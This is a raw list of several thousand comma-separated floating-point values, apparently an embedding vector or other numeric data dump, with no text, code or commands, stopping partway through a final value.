0.021367943,-0.008272418,-0.014241639,-0.036300533,0.033473488,0.02398387,-0.0023864072,0.019791411,0.04383491,0.008236889,0.021222027,0.04059321,0.03804696,-0.0022486125,-0.02238146,-0.00011025445,0.01568058,-0.012940003,-0.005916307,-0.0008044639,-0.016920382,0.022901798,0.008218203,0.002001103,-0.020129038,0.023520313,0.0068097403,-0.02731947,0.005380562,0.014374936,0.0027666371,0.036621056,0.0007682422,0.056261837,-0.016834343,-0.02077104,-0.028245596,0.041141078,-0.005583393,0.0016307981,0.03425096,-0.0038994413,0.00042383952,-0.0121414475,-0.0017936889,0.011678693,0.006762452,-0.025308184,0.00434617,-0.0072189406,-0.011292738,-0.018342955,0.012322329,0.017828777,-0.0015001899,-0.0013683354,-0.017738398,-0.013884474,0.003440944,0.0476472,0.023471368,-0.0010216607,-0.017792815,-0.02793415,0.004474806,0.006849508,-0.013053698,0.01548127,-0.014751725,0.014080776,0.013280178,0.0029267184,0.034433134,0.009204119,0.003736329,0.019954655,0.005110517,0.02687652,0.016961772,0.01852669,-0.011675116,0.014616842,0.0058750114,-0.0294468,0.018924315,-0.0054154634,0.010674174,-0.020353496,0.0010316418,0.009327057,0.0009823384,-0.004249868,0.029619223,-0.004860301,-0.011880939,-0.0056644687,-0.009744612,-0.002958242,-0.02177905,0.00835727,-0.016182214,0.002193662,-0.026542114,-0.0004133638,0.028742755,0.0069242725,-0.00942094,0.0019084263,0.03438626,-0.0016500521,0.02874687,0.0015599523,-0.018660236,0.017143294,0.0042634057,-0.01604617,-0.01695884,0.014920069,-0.013852624,-0.002830584,0.011045019,0.00041568428,0.00008266499,-0.0013426935,-0.0023565406,0.013326054,-0.0013986054,0.030565202,-0.017415782,0.015433636,-0.03134932,0.0029306689,0.004445499,-0.01748642,-0.017917598,0.013158069,0.020804642,-0.019170891,-0.0036144156,0.0154605415,0.013445231,-0.0015401933,-0.018679902,0.010696279,-0.06727563,-0.01641624,-0.02454002,-0.012572255,-0.009529725,0.021660589,0.03468875,0.03479864,0.027949946,0.0013010087,-0.017331908,-0.005607847,-0.014165539,0.022833895,0.006426167,0.006574187,-0.028867222,-0.009667395,-0.013313949,-0.023153482,-0.0030207634,0.032770034,0.0066545815,0.016790483,-0.009548538,0.022815742,-0.024939308,-0.0017694542,0.015928954,-0.04021119,0.018034115,0.00062720774,-0.007816277,0.018861828,-0.009409361,-0.007325724,0.00094740535,-0.030633148,-0.018587735,0.009654646,0.0061690775,-0.0269588,-0.016576465,0.014899146,0.009061164,0.01862541,-0.03298646,0.0001567471,-0.0039455993,0.013906858,0.0008504653,0.020687632,-0.018638384,0.013057831,-0.0014870829,-0.004072252,0.0150358025,0.028082892,0.0130234165,-0.025144318,0.007019144,-0.0140269855,-0.0055862903,-0.016366484,-0.0049245534,0.042229466,0.030829318,-0.0016164028,-0.008497952,-0.02692014,0.017530186,0.0014536355,0.0014684084,-0.0056921425,0.031146226,0.02410741,-0.0044644107,0.016707206,-0.0038539292,0.02598069,0.005587121,-0.011151427,0.006668514,0.021128982,0.019196669,-0.010100311,-0.0015558384,0.007993878,-0.004323764,-0.011486846,-0.010148498,-0.020736119,-0.013247531,-0.021954006,-0.00974911,0.0011097285,-0.01773355,-0.03522786,0.006662698,0.0027345156,-0.004542134,-0.040329453,0.006320837,-0.03066501,-0.0126088755,-0.0031967727,-0.041317556,-0.028219579,0.0074335346,0.016485894,-0.024878552,-0.009620664,0.004224792,-0.024612304,0.0045594196,0.020239856,-0.017307466,-0.008319615,-0.012218589,0.014011512,0.017182749,-0.0076828217,0.019551707,0.0038840813,-0.010150787,0.012969968,-0.020664541,-0.00074027135,-0.00466166,0.013479248,0.01727708,-0.01824684,-0.015226296,-0.0034215273,-0.018452594,-0.011519994,0.017839026,0.009363974,-0.023846904,-0.0058201686,-0.005795357,-0.0014119967,0.016485061,-0.011576531,0.019650172,0.010701387,0.00042721277,-0.00002729825,-0.0032474825,0.01624788,0.019153634,0.043898847,0.01483527,-0.012352979,-0.013475398,0.010634575,-0.008547158,-0.012444245,0.006662759,-0.02612167,-0.025939895,-0.012063299,-0.0032714992,-0.026479214,0.010938552,0.005717647,-0.031808596,-0.00006241794,-0.019880066,0.0059468267,0.0066519496,0.031895462,0.008752712,-0.013326196,0.015328432,-0.03482708,-0.020661421,0.029045384,-0.0047588157,0.031828348,0.023295065,-0.009577544,-0.008349329,-0.014606016,0.001902896,-0.013910099,0.023666887,0.012718405,-0.008897617,-0.017267527,-0.005388202,-0.0051267873,0.020128293,-0.03260516,0.01569529,0.0009106493,0.017790623,-0.0031161606,0.01552732,-0.023199365,0.016447531,0.0003739302,0.005749641,0.027968267,-0.022824299,0.01212443,-0.017954975,0.0057732705,-0.011680403,-0.008501607,0.019612733,-0.008445,0.023986816,0.02537959,0.009664216,-0.0016781087,-0.0041341325,-0.014927543,-0.037447535,-0.0192971,0.018054295,-0.012689155,0.023104487,0.0023472772,0.006546078,0.0010598879,0.0068561994,0.034383424,-0.011672673,0.02469782,0.015872689,-0.00065078284,-0.012122017,-0.005418727,0.018559465,0.009875939,0.0018445593,-0.010885421,0.003367376,0.006186306,0.025414083,-0.0040853308,-0.019279743,0.018085867,-0.008129016,-0.00089421397,0.012148093,0.01993972,-0.01677496,-0.0071197017,0.024390424,-0.021009143,-0.0023202992,-0.038445413,-0.00943863,0.0054864245,-0.041486565,-0.012324759,-0.00980631,-0.00057461404,0.017512128,0.013085126,-0.0049654054,-0.00056092,0.006621182,-0.007178453,0.012527426,0.001632015,-0.013418457,-0.004310732,0.0057321447,-0.0025509335,-0.011794664,0.00057112204,-0.008652955,-0.0077669267,0.020825597,0.0057867104,0.016225263,0.009824281,-0.016725952,0.018388938,0.0132401455,-0.024238901,0.013438017,-0.008133406,-0.015785236,0.0030013272,-0.020064607,0.010011492,-0.019540258,0.0055849957,0.011863681,-0.017215949,-0.029751036,-0.014831234,-0.027622655,0.018872254,-0.006662241,-0.014041279,0.008893945,0.0106244385,-0.0022212588,0.00073634513,0.021844162,0.0063661216,-0.020880563,-0.008685638,0.014822408,0.001966436,0.035119962,-0.0067040897,-0.029588401,0.028856242,0.008637282,-0.0022342447,-0.0009074034,0.0014525639,0.009621714,-0.014932321,0.048557863,0.01660289,0.014789492,-0.024077814,-0.01701888,0.012331995,-0.00042910126,0.040012818,-0.006928677,0.0023559423,-0.015164895,-0.009043924,0.0041940813,0.04005228,-0.004161534,0.01076175,0.0029425933,0.0072026597,0.0028326209,0.027411362,-0.01585008,-0.019547734,0.0099235745,0.01673706,0.008395449,0.0023647884,0.013286541,-0.0026792388,-0.014721813,0.008841886,-0.008789351,0.025868766,0.0043556727,-0.007220988,0.0032462124,-0.0012175803,-0.008326011,-0.00799943,0.02679281,0.026534842,-0.015225914,-0.0033380908,0.014353469,0.07308562,-0.0017506629,-0.018294202,-0.021348216,-0.009154124,-0.003040435,-0.013854869,-0.012615562,0.019793259,-0.01793356,-0.0023260058,0.00091103575,-0.015144176,-0.017300136,-0.0052830554,-0.010612793,0.0067533865,-0.03586086,-0.00068455975,-0.026500609,-0.011691658,0.008113959,-0.014915848,-0.03775074,0.005127485,0.030777428,0.024559824,0.00447767,0.0047682878,0.002928402,0.0048052794,-0.0044357944,0.0010839653,0.029679146,0.0058434308,-0.018970616,0.020908618,0.013669722,0.0008282938,0.0057988693,0.017999928,0.036050897,0.019059097,-0.013686181,0.00047556643,-0.0038065228,0.002497627,0.002297861,0.009593744,-0.0004138424,-0.017203663,0.025253465,0.010823923,0.0074145147,-0.006243212,0.0046406244,0.00518824,0.0218511,-0.032089557,0.011807031,-0.00020026589,-0.021981705,0.003944814,-0.004374379,-0.0014733105,0.0004924611,-0.011964988,0.019275017,0.0057412935,0.020289924,-0.011294248,-0.01110865,-0.016868385,-0.012109758,0.007677526,-0.01669167,-0.007922038,-0.011121002,-0.01434924,-0.02294171,0.005423836,-0.0021010162,-0.0034494125,0.009888413,0.023653649,0.010597501,0.00650654,-0.010362637,-0.006134703,0.013635012,-0.0181369,0.013086714,0.014494547,-0.0035560909,-0.031205468,-0.017743684,0.008904624,-0.0315814,0.005233938,-0.011574331,-0.0154479975,-0.009359161,-0.02267979,-0.011321037,0.010763185,-0.006636052,0.023436084,0.015087618,-0.017573519,0.030018557,0.01750441,0.007854025,0.026862377,-0.0070650345,0.027514452,0.033396136,0.009629741,0.0024517826,0.0015521672,-0.0018190336,-0.007188579,-0.028961595,0.006748658,-0.004200945,0.009469801,-0.004293436,-0.020379642,-0.010126072,0.029589588,-0.012799868,-0.0050385934,0.006495883,-0.00072875206,-0.0016415416,0.03410993,-0.0065491186,0.019005628,-0.009203686,0.022967743,0.019939227,-0.021565683,-0.0039240774,-0.009187647,0.002071036,0.0033636424,0.012679682,-0.019058948,-0.005436369,0.030089082,-0.023369458,-0.0027332434,-0.00016167513,-0.006902563,-0.002564482,0.014724004,0.02597171,-0.0076170564,0.007251558,-0.024745395,0.027853351,0.021347696,0.021998828,-0.0026798544,0.021538284,-0.0034936734,0.018273849,-0.00961885,-0.004364741,0.029379316,-0.010053131,0.017108966,-0.024386805,-0.016119514,0.0082421,0.008914285,0.022061992,-0.00037231104,0.000025565521,0.04289855,-0.000013325786,-0.012293271,-0.013724188,0.022422489,-0.00859355,0.0071627963,-0.000061710016,0.0068547884,-0.0074073314,-0.008568993,-0.021492263,-0.006784665,-0.03252179,-0.0009284559,0.0021309953,0.004311681,-0.013024837,-0.017912878,-0.0021163106,-0.0063302163,0.001519385,-0.013308744,0.030984063,0.010711981,-0.012587533,0.0055483943,0.018696029,0.030415094,0.009158737,-0.011062821,-0.015427116,-0.013070771,0.019960845,0.017078787,-0.025633944,-0.01952073,-0.0044632424,-0.025021877,0.012608216,0.0015204076,0.028025022,-0.025727617,-0.0004826065,0.0056498386,-0.031007195,-0.0032917808,-0.0012093778,-0.0036027462,-0.0010077682,-0.0094785895,-0.0149530275,-0.0007435326,0.012096269,-0.014043587,0.09114712,-0.015996277,0.027346473,0.0011705451,-0.005615818,-0.006957238,0.012794897,0.00993485,0.0043870937,-0.014452508,-0.018385427,0.0063066906,-0.02099291,-0.014554774,0.017019676,0.0023499331,0.014425846,0.016430285,-0.0053995443,0.00015323643,0.0056367465,0.0044342917,0.015708216,-0.0026785622,-0.0012542513,0.009374571,0.028819207,-0.0039596837,0.03984714,-0.022448238,-0.0073686326,-0.018567538,0.01742476,0.0089818295,-0.0058903685,0.0014156644,0.008996983,-0.013288707,-0.02834157,0.017772028,0.004154724,-0.03215574,0.05022472,0.028216332,0.0049150684,-0.012174095,-0.021163035,0.013401957,0.008725589,-0.0154241,0.022644768,-0.020090599,-0.019923666,-0.01273958,-0.0040837764,0.014580103,-0.010671642,0.006738558,0.017078536,-0.013575685,0.014664169,-0.009328461,0.021639558,0.007868665,0.013095551,-0.0024575125,-0.0107439915,-0.0027827646,0.021758625,-0.02318884,0.022180809,-0.017491063,0.02611116,0.02625307,0.0037096047,-0.0052611465,0.015173398,-0.02152414,-0.00019077027,-0.04004499,-0.00749318,0.0142073,0.02844563,0.016920602,0.003985617,0.024229381,-0.0012247274,0.011285899,0.062363546,0.00033636708,-0.008390599,-0.0070614032,0.0041527604,0.007259452,-0.010690211,0.018882904,-0.002593874,0.0127987815,-0.026085721,0.010581629,-0.021982737,-0.019576348,-0.005635386,-0.014251462,0.005533114,0.0022320417,0.0011658701,-0.0021010407,0.027208155,0.01398212,0.025116079,0.017231591,0.0009232066,-0.008804139,0.007001901,-0.007951576,0.020915758,-0.014208015,0.012971416,0.026473673,-0.006250423,-0.0052307644,-0.020738317,-0.030991632,0.017623238,0.10642274,0.0208162,0.011474394,0.004535902,0.016323505,-0.00079838885,-0.08524266,-0.022868877,0.004821782,-0.013823569,-0.015225244,-0.027597716,-0.008813454,0.024657944,0.014645052,-0.033566307,-0.013715883,-0.027324127,-0.0009380651,-0.012279778,0.0009363684,0.006469679,0.0085075805,0.014653712,-0.014827029,0.010138896,-0.0021021296,-0.014431849,0.0006649729,0.004993364,0.01133341,-0.006064545,-0.0028814299,-0.016657438,-0.012282547,0.0035365021,0.01735431,0.010492898,-0.01073806,0.0070187324,0.03997874,0.004120705,-0.006321427,-0.0015925345,-0.113891356,0.016332649,0.016146444,-0.027598334,0.036328465,0.00584039,-0.016196182,0.00981634,0.009521046,-0.012552429,-0.007313405,0.02616045,-0.01754334,-0.013500548,-0.02687388,-0.011572292,-0.008109435,-0.004959267,-0.019673835,0.003228453,-0.010002764,-0.016145526,-0.011814551,-0.024414575,-0.020164493,0.0072335056,0.009718226,0.0440696,-0.015649904,-0.010149376,-0.0059142527,0.013589444,-0.014180918,-0.022854112,0.004670488,-0.01271174,-0.042076055,0.006984377,-0.0039341804,0.008330575,-0.0015961998,-0.0045365253,-0.024116674,0.008273673,0.013035784,0.017895296,0.009989287,0.026936004,0.007248393,0.00070763356,0.030140374,0.013804428,-0.017747173,0.011012087,-0.034036446,-0.009650357,-0.0024519637,-0.00010938922,0.0071519846,0.010321389,-0.0063885325,-0.02200907,0.0016634722,-0.009016094,0.028529473,0.021672422,0.020268556,-0.022017322,0.0142561095,0.0042705005,-0.009907477,-0.011699654,0.01725378,-0.041903857,0.008121566,0.015232531,0.0033665232,0.011238432,0.014058878,-0.019006103,0.015583252,-0.030996589,0.0053875274,-0.037811417,0.019676916,-0.0014496825,-0.0015018109,0.013621382,-0.012405119,0.0070107393,0.051961955,0.012447816,0.00960175,-0.030803036,0.008699327,0.019285055,0.024179857,-0.004263037,-0.021505391,-0.007926757,-0.004380162,-0.022700509,0.00019886404,-0.0008881353,-0.015119932,0.021245971,-0.0029580707,-0.005850006,0.006412456,0.01402679,-0.011508303,-0.028771147,0.03141836,0.010522502,-0.012695714,-0.0031149164,0.009187884,0.00903459,0.0037653723,-0.010270153,-0.020894941,0.002405841,0.012244174,0.004926747,0.019440506,0.008088704,-0.03211348,0.0067038406,0.0072836545,0.02036715,-0.010519179,0.021071738,-0.013249866,0.0116451755,-0.0096562095,-0.001012887,-0.013695128,0.015632434,-0.015823055,0.016903535,-0.0023553201,-0.026270233,-0.012824769,0.0112144295,-0.0006345279,-0.007818999,0.004267355,-0.017904542,0.014615864,0.019401783,-0.0077693444,0.022355596,-0.010462274,-0.00006014854,0.004358962,0.060481213,0.005356088,-0.020159228,0.037179064,0.005479598,0.0049570706,0.04357054,-0.006819664,-0.011417099,0.0066594626,-0.043028653,-0.003487046,0.014091987,-0.0061388575,-0.010637985,0.014833445,-0.007863805,0.0314514,0.019501187,-0.008255902,0.003092105,-0.0038804566,-0.009714826,0.018993177,0.009002379,-0.0015706342,0.003851643,0.011903301,-0.0073998794,0.006068525,-0.005292339,-0.018765468,0.00022006988,0.0066045104,0.012184392,-0.0451024,-0.021097831,-0.012847873,0.0068848333,-0.025207313,0.0093555795,0.017149404,0.0044021406,-0.005129669,0.003205987,-0.0026314699,-0.024748186,0.031235985,0.0036057287,-0.012498598,0.00690172,0.02928391,0.012807869,-0.012605245,-0.0077449153,-0.03249733,-0.020511588,0.00605864,0.017834552,-0.016032599,0.004336911,-0.011221693,-0.006710588,-0.025856813,-0.004668201,0.0083057685,-0.00012142957,0.021302903,-0.0014712907,0.021976799,-0.009333256,0.006611147,-0.0072507085,0.0004157395,-0.0022676026,0.0048801797,-0.007901803,0.012648379,-0.016378615,0.020139836,0.011459495,0.008760777,0.0058274767,-0.011046523,-0.027065184,-0.0255159,-0.014103392,0.0026010112,-0.0287006,-0.01380681,0.033691492,-0.007906063,-0.0036292106,0.0070586847,0.004676842,0.01945022,0.01275027,0.0014813712,0.024530947,-0.0148570845,0.0064520696,0.020437201,-0.0035750915,-0.018650606,0.002910415,-0.037887,-0.0015251527,0.0043592113,0.035717037,-0.02414209,-0.015678097,0.0010953496,0.005247971,-0.036258783,-0.009289296,0.04040177,0.014933023,0.014534834,0.030192073,-0.0088284025,0.0053855744,0.01692767,0.015757294,-0.021899786,0.014632068,-0.009425464,0.024013167,0.0049177296,-0.017053425,0.0259767,-0.0075131687,0.012135354,0.005888926,0.0000084116455,0.000029520548,0.0061127814,0.01153525,-0.0027258235,-0.006485666,0.009318797,-0.009585751,-0.0410623,-0.0051814984,0.022975696,0.00076163834,0.020822758,0.024018206,-0.02069897,-0.036265966,0.003311804,0.029927162,0.009173142,0.0039181164,0.001756908,0.013316808,0.011729523,0.024459587,-0.008762218,-0.042757865,-0.009179938,-0.012259434,-0.00009868754,0.011146932,-0.008159253,-0.015399246,0.018367374,0.025284126,0.010898703,-0.0020517616,0.00018397809,0.0052769566,-0.038380586,-0.013722396,-0.0024148407,0.00008784469,-0.024168428,-0.00028960942,0.0050022104,-0.0372987,-0.008472379,0.016071118,0.026116401,-0.0026228917,0.015397352,0.014629436,0.015851881,0.016228255,0.009952323,-0.002323255,0.0019019261,-0.026996683,0.005094175,-0.013452614,-0.006919512,-0.048876513,-0.016988335,0.020519374,-0.037999682,-0.009381838,-0.008822121,0.020902932,-0.005208718,-0.021895899,-0.025665319,-0.007255287,-0.026176808,-0.026919512,-0.021835951,0.007505644,0.014510701,0.0012848395,0.0093063675,-0.004170174,0.009797826,0.004768613,0.010891085,0.008467824,0.030206935,-0.01946658,-0.0335825,0.0036636682,-0.006977073,-0.004361738,-0.0028853682,-0.0036007338,-0.0009295973,-0.010865877,0.026572565,-0.015144777,-0.003615736,-0.00020987372,0.006594831,0.033184923,-0.0012550023,-0.012144481,-0.0077593103,0.008671997,0.01229356,-0.014432681,-0.0016550603,0.021235893,-0.031030731,-0.017882317,0.023747833,-0.0055146054,0.019382605,-0.0050164703,0.019575175,0.008428047,0.01181705,-0.0027599307,-0.023671605,-0.045687076,-0.01049041,0.010157041,-0.036111806,0.012121388,0.01303667,-0.012185792,-0.016570559,-0.0028871875,-0.0015247907,-0.01059679,-0.01619559,0.013807915,0.004443727,0.007962512,0.010525389,0.0042001433,0.011336953,0.013427061,0.00027390668,-0.014986735,0.009434874,-0.009050133,-0.0042991117,0.017980682,-0.01878398,-0.021319294,0.0064809057,0.038703814,-0.0084317,0.023844607,-0.0044484716,0.00028471558,-0.014449076,0.0018919138,0.0077087074,0.015113125,-0.006104729,-0.01845701,0.027169697,-0.017238129,0.0069947448,0.00013315973,-0.036989033,-0.012801311,-0.0012660179,0.0009293221,0.012071191,0.009552518,-0.009390535,0.00985412,0.006994594,0.0044647073,-0.013405887,0.0067372024,-0.007841155,0.023633895,-0.004064273,-0.0058686207,-0.0031599991,0.0049544717,-0.0014435482,0.017132126,0.0109897135,-0.008155145,0.027727842,-0.01872749,0.022161366,-0.0074144136,0.0123316515,0.009822221,0.005984884,-0.027094586,0.03890675,-0.024167335,-0.009696257,-0.0010294479,-0.01997269,0.015707409,-0.014165476,0.02295149,-0.08106606,0.023380987,-0.015414206,-0.024813019,-0.023597417,-0.01349744,0.025643649,0.03256543,0.0164394,-0.035916094,-0.0077949786,0.031433363,-0.0038131247,0.0030721107,-0.018812565,-0.014602641,-0.02155706,0.012527882,0.014735255,0.0033497924,0.013055377,-0.012084742,0.019863155,0.0082727,0.032584812,0.0041503003,0.01376061,0.018003702,-0.0065516015,0.021755809,0.0073238593,-0.0040008854,0.0011462079,0.004196248,0.005684445,-0.006138572,-0.0007298465,0.01595462,0.0009402958,0.0048449175,-0.0020848203,-0.00463132,0.00695197,-0.01063676,0.021660598,-0.0043960093,-0.004858165,0.01749395,0.015450397,0.029335488,-0.0075585493,0.01943224,0.0046742787,-0.0012087349,-0.00573925,0.0036751183,-0.00037087928,0.007199607,-0.0033379819,-0.0003774878,-0.008417419,-0.0014908426,-0.012106032,-0.025538526,0.0038570447,0.000856697,0.014930961,0.0032711164,-0.03108892,0.0063277427,-0.0020822505,0.020779459,-0.010281932,0.0064751315,-0.0031891817,0.008004034,0.009236429,0.0036468967,-0.01443637,0.032243967,-0.031045984,-0.012901292,0.014124926,0.02877068,-0.009498105,-0.043925915,-0.0075730016,0.011492622,-0.021251388,0.0070935762,0.022233032,-0.013700444,-0.0040168255,-0.028900176,0.004980526,-0.0077921003,-0.03408711,0.022634732,-0.021165758,0.010909894,-0.009507674,-0.002480002,0.015784467,-0.038745392,-0.14350152,0.013947852,0.02736593,-0.003922863,-0.017239286,-0.03221949,0.014697898,-0.00011643883,0.03120268,0.011855205,-0.009675455,0.016961087,-0.019565899,-0.015764799,-0.0060358,0.016137315,-0.035110094,-0.014173478,0.0327462,-0.000959086,0.00082345173,-0.013878497,0.010164978,0.01602693,0.011151084,0.013585923,0.0046620234,0.031411957,0.025003476,-0.016449468,0.006304487,-0.00062206225,-0.0064572524,0.010294634,-0.047913086,-0.0080492385,-0.003406784,-0.028512847,-0.012161382,0.027134746,0.0006750865,-0.02220753,-0.007835084,0.020830609,-0.008806023,-0.0012069036,0.00045031402,0.012405815,-0.012563969,-0.007459543,0.001341597,-0.0016821492,-0.003787565,0.017418217,-0.00031213835,0.0110901715,-0.006985453,-0.001483064,-0.008193295,-0.010878863,0.005620927,-0.0023221557,-0.005094373,0.004332178,0.0073183626,0.027768107,0.00055132917,0.00026173537,-0.014677725,-0.025030285,-0.014269589,0.008857779,0.0042428914,-0.022260861,0.015271301,-0.0029084508,0.00023097331,0.0052887374,0.00978895,0.016107142,0.02558798,-0.011325114,-0.013949237,0.017822234,-0.03656154,0.0060071507,0.035966367,0.0027832082,-0.0053496314,0.01177744,0.04197752,0.0172941,-0.004481587,-0.0010722235,-0.012194483,0.011227557,0.047821067,0.0043148138,-0.0068327603,-0.0027477313,-0.019076223,-0.037598256,0.008973309,0.016785644,-0.017644467,0.029975893,0.042953122,0.002682677,0.026868135,0.01931622,-0.01512743,0.034709014,-0.019956639,0.004698198,-0.01457108,0.005879275,-0.015799645,0.00671047,-0.012943624,-0.01742084,0.0037116597,-0.008877566,0.0039361254,-0.024711736,0.000982454,-0.01454967,0.0017895103,0.0026619453,-0.003998559,-0.024247989,0.006681794,-0.0049876305,0.016618606,-0.026513306,-0.03218181,0.014345775,-0.010275311,0.02513976,0.029336942,-0.009756775,0.012682887,-0.0015552548,0.004375096,-0.009132609,0.017822549,-0.0040130434,-0.008214147,0.018862337,-0.014034,0.011484853,-0.010149661,-0.023323558,0.0217111,0.014530807,-0.0021867685,0.0058114305,0.010479117,0.010051128,0.004135625,0.016452176,0.0013652429,0.026523821,0.024444517,-0.018484581,0.002243068,-0.013796949,-0.00069233665,0.0063635563,-0.0028852073,-0.0028984966,0.028242312,0.002294431,0.0097146,-0.036679685,0.018725505,-0.012528715,0.018806225,-0.000007682944,0.039133996,0.01972139,-0.015854042,-0.007465379,-0.019598829,-0.012489421,0.002440446,0.02388832,-0.0028388656,0.0034572247,-0.0046303133,-0.010619569,0.031245206,-0.0018372368,0.014322288,-0.01799378,0.00071377994,0.0037114748,0.007814597,0.006275298,0.009502524,0.014057638,-0.01985959,0.021978676,-0.0020160277,-0.0038537395,0.008035707,-0.006515058,0.0007991004,0.024072485,0.004197147,-0.016540213,-0.010886172,0.015319163,-0.016184863,-0.0066955374,0.0045915875,0.023969559,-0.008871801,-0.025653932,0.02984375,0.014417999,-0.013643993,-0.016126892,0.022992015,0.025172811,-0.008586263,0.025176693,0.008363802,0.012742172,-0.031296737,-0.016817778,-0.007942179,0.023373824,-0.02409463,-0.0024464189,0.018677955,0.015313054,0.010586111,0.02837388,0.019320203,-0.009260133,0.03127579,0.0031424633,0.0013215074,0.028645346,0.016304238,0.010462534,0.008132619,-0.026570218,0.007906899,0.021752367,0.0065414626,-0.0042323777,-0.01322713,-0.006615806,0.0054479702,0.01564153,0.005758977,0.014822158,-0.01334096,0.014369797,-0.033729807,-0.0074313357,-0.008320124,-0.030579278,0.009094337,0.017824952,0.015993675,-0.01464397,-0.0037889578,0.0053380984,0.016888753,0.028591972,0.0028523705,0.030059075,0.010804541,-0.00015514976,0.0018114268,0.021297524,0.0037503103,-0.009242245,0.030307338,0.000170277,-0.0009996523,0.022168577,0.015566062,-0.009547101,0.019712977,0.00047932097,-0.024919264,-0.02994191,-0.0005841848,0.011877472,-0.0011557115,-0.009826557,0.018373074,0.0052208626,-0.017538017,0.00013957874,0.0016818995,0.020357512,0.0038029533,-0.0011561472,-0.0029962643,-0.00021756021,0.026469363,-0.006319818,-0.00096897484,0.021705175,-0.0043206504,-0.0014980268,-0.017648343,0.016929623,-0.0045426334,0.026733346,0.009756143,-0.00062992633,0.017241323,-0.012698876,-0.04672527,-0.011287269,-0.017529044,-0.0013661459,0.030702839,-0.013527955,-0.00029138746,0.0071057547,-0.009191636,0.025070835,-0.0019303133,-0.011148617,0.017641952,0.017361598,-0.00031366217,-0.0041645993,0.004392433,0.014749748,0.023088582,0.029180976,0.0041906675,-0.0077248598,0.021759294,0.0070218462,0.003983313,0.03209674,-0.01415578,0.0018288404,-0.0027231392,0.013378005,0.009039648,0.003884726,-0.012146289,-0.008982117,-0.033182636,0.00061271514,0.0032253268,0.01179341,-0.03258235,0.0030646734,0.004744849,0.004179676,-0.01202064,0.00008337037,-0.0048042336,-0.010347287,0.013862776,-0.008680878,-0.013861298,0.014997512,-0.007203759,0.022339966,-0.012956133,0.008101863,-0.024805032,-0.022793833,-0.017461838,-0.065346375,-0.034246378,0.025597384,0.015361355,0.058830943,-0.00221889,0.013897364,0.0025617722,0.0013158227,0.010985339,-0.00056316104,-0.004731738,0.009029111,0.03729307,0.014319496,-0.008626044,-0.013985577,-0.010967018,-0.000027605636,-0.0387717,-0.015201661,-0.011796387,-0.00482279,-0.028829347,-0.014041022,-0.00889212,-0.0001906079,-0.018305212,0.000039490213,0.017844459,0.0020275044,-0.009733537,-0.0010185107,-0.02016312,-0.014557065,0.012637235,0.0015705196,-0.005009515,-0.007821594,-0.023727925,0.010636011,0.004817831,-0.0066326475,0.008581177,-0.021565648,-0.00026242627,-0.05129385,0.0021064912,-0.010057046,0.009371083,0.00022400882,0.039061476,-0.015942482,0.024474693,0.01903231,0.016130444,0.014141011,-0.0141798165,0.04234798,-0.00022728785,-0.0070850234,0.008314169,0.0059686666,0.004024288,-0.01685537,-0.020476688,0.0066758674,0.025765019,-0.0125116585,-0.004912308,-0.0023032369,-0.011195731,-0.0005739094,-0.010474786,-0.007562438,-0.000038459908,0.020200819,-0.014165949,-0.002260952,-0.0019042945,0.020972947,-0.014738062,0.026952019,0.013512404,0.014239948,0.04057207,0.009053392,0.013477935,0.0069249193,0.015126044,-0.005821291,-0.011143759,0.014532184,-0.00474945,0.010893242,0.02298005,-0.011871133,0.0093849795,0.01280389,0.0007177782,0.0019836528,0.0071354266,-0.0019885101,-0.0054027913,-0.012549381,-0.015614911,0.010304202,0.0024590874,-0.020279896,0.0021899384,0.014472806,0.0151684545,0.016219199,0.033229552,0.01456938,0.021929594,-0.010944601,0.0076848064,-0.007179009,-0.019343853,-0.011647822,-0.02308079,-0.007876919,0.03499394,0.029471837,0.0094808545,0.02768616,-0.014623142,-0.006538788,0.008787318,-0.004645832,0.008999554,0.0008894384,0.018825011,-0.012163254,0.010346976,-0.0060012587,0.0036061474,-0.002655526,0.016812386,0.001991226,-0.038053498,0.011238462,-0.021120712,-0.01087325,0.020379785,0.006360501,-0.012261195,0.007755338,-0.0091800615,-0.0030075745,-0.008722193,-0.01536334,-0.013265971,-0.00315125,0.0034731636,-0.009085513,-0.013266374,-0.023807717,-0.009454649,-0.0034777832,0.043301046,-0.012283688,-0.0030491487,-0.0015347898,0.016982635,0.018971842,-0.0042651896,-0.0133531755,-0.015652167,-0.0054402747,-0.013020783,0.002191333,-0.01576056,-0.01933734,-0.0037327728,0.00892393,0.040765714,0.0173442,0.0376031,-0.042402904,0.0035340248,-0.019242758,-0.009314272,0.006589565,-0.01894496,0.02108007,0.014160829,0.0034187313,-0.003597916,0.011643165,-0.022614647,-0.011962671,-0.0023493282,-0.005410203,-0.0074530286,0.016285209,-0.008364863,-0.041035704,0.0018645172,0.008486064,0.02243394,-0.0005379495,0.00040453926,0.042652372,0.0016707111,0.013293493,0.007170713,-0.038785826,0.0008534658,-0.001855706,0.012122471,-0.018972175,0.090979956,-0.01092096,-0.024601707,0.0034880706,-0.002634977,-0.0046058614,-0.0011765301,-0.00778295,-0.0032318635,0.009509759,0.018157015,-0.018192818,0.024127616,-0.015817896,-0.016063686,0.020500727,0.015925676,-0.028766667,0.0007949883,0.024149716,0.009861832,-0.03716023,-0.01926644,-0.025543224,-0.03577044,-0.06352449,0.014932874,0.021019593,-0.009870915,0.01681689,0.022970488,-0.004179187,-0.010167257,0.038402643,-0.027875377,0.0026358308,0.0025626218,-0.015217215,-0.00077114603,-0.008763286,0.01248408,0.0046338425,0.0033527226,-0.009626387,0.000753976,-0.023712885,0.0017337804,0.005914106,0.0014083716,-0.012869491,0.00037798838,-0.000280781,-0.00049691147,-0.01613723,0.0044208425,-0.023577582,0.024094498,-0.014334168,0.041703105,0.009624485,0.007488181,-0.0044075246,-0.013417413,-0.014144426,0.009021298,-0.015158124,-0.007962043,0.0041213725,-0.043651696,0.003561628,-0.0027825462,0.014745284,0.0147764245,-0.006815353,0.0029890689,-0.008453125,-0.005083677,0.0063149496,0.0021984319,-0.0013114397,0.017441731,-0.01740503,0.016789284,-0.0003765944,0.01274419,0.0059396406,-0.03141034,0.011963743,-0.009134697,-0.016676875,0.0036309364,0.005527042,0.0314904,0.033859964,0.0059638596,-0.00973082,0.02714485,-0.0149831455,-0.024733853,0.013188205,-0.0052052224,-0.026856188,-0.0011084308,0.034452755,-0.0071538864,-0.012834835,-0.0147667425,-0.007812791,-0.025768345,-0.011405871,0.00028232494,0.027213376,0.0029474406,0.04823462,0.020672193,0.018106826,-0.01439347,-0.007903509,0.007360846,-0.021603199,-0.0075735943,0.015211909,0.0026792875,0.028259316,0.00766635,0.007629273,-0.012352784,-0.00670423,0.017897343,-0.019195585,0.0048635835,-0.0